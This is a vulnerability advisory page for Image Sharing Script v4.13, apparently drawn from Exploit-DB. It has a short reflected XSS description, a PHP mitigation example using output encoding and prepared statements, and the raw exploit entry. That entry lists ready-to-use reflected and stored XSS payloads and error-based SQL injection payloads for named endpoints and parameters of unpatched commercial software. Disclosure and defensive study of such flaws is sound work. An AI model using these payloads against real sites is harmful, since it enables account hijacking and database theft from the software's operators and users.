Vendor: Image Sharing Script
By: Hasan Emre Ozer
CVSS: 7,5 (HIGH)
Reflected XSS
CWE: 79
Product Name: Image Sharing Script
Affected Version From: v4.13
Affected Version To: v4.13
Patch Exists: NO
Related CWE: N/A
CPE: a:itechscripts:image_sharing_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2017

Image Sharing Script v4.13 – Multiple Vulnerability

A reflected XSS vulnerability exists in Image Sharing Script v4.13. An attacker can inject malicious JavaScript code through the vulnerable parameter 'q' of the 'searchpin.php' page. The injected code is executed in the victim's browser when the vulnerable page is accessed.

Mitigation:

Input validation should be done on the server side to prevent malicious code injection.
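
As an added illustration of this mitigation (not code from the vendor or from the original advisory), the PHP example below encodes the 'q' value when it is written back into HTML and validates and binds 'pid' before it reaches the database. The function names, the `pins` table and its columns, the in-memory SQLite database and the assumption that 'pid' is an integer are all hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical handlers, not the vendor's code.

/** Encode a request value for use in HTML text or a quoted attribute. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close value="...".
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Re-display the search term (the 'q' parameter) in the search box. */
function render_search_box(string $q): string
{
    return '<input type="text" name="q" value="' . h($q) . '">';
}

/** Look up one row by id (the 'pid' parameter); assumes ids are integers. */
function find_pin(PDO $db, string $pid): ?array
{
    // Server-side validation: reject anything that is not a positive integer.
    $id = filter_var($pid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // Parameter binding: the value is never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT id, title FROM pins WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data: in-memory SQLite stands in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pins (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO pins (id, title) VALUES (1, 'Sunset')");

// The test string from the report is emitted as inert, encoded text.
echo render_search_box('"><img src=i onerror=prompt(1)>'), PHP_EOL;
// A valid id is looked up through the bound parameter.
var_dump(find_pin($db, '1'));
// A constructed non-integer value is rejected before any SQL is prepared.
var_dump(find_pin($db, "1' AND 'a'='a"));
```

Error-based injection also depends on database error text reaching the response, so keep PHP's `display_errors` off in production and log exceptions server-side instead.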

Exploit-DB raw data:

Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 16/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/image-sharing-script/
Software Price and Demo : $1250
http://photo-sharing.itechscripts.com/

--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/searchpin.php
Vulnerable Parameters : q=
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
Vulnerable Parameters: pid
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/categorypage.php
Vulnerable Parameters: token
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH

--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/categorypage.php
Vulnerable Parameters : token
Payload:"><img src=i onerror=prompt(1)>

-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
Method: POST
Vulnerable Parameters : &text=
Payload:<img src=i onerror=prompt(1)>
--------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
Vulnerable Parameters: id
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
---------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
Vulnerable Parameters: brdId
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH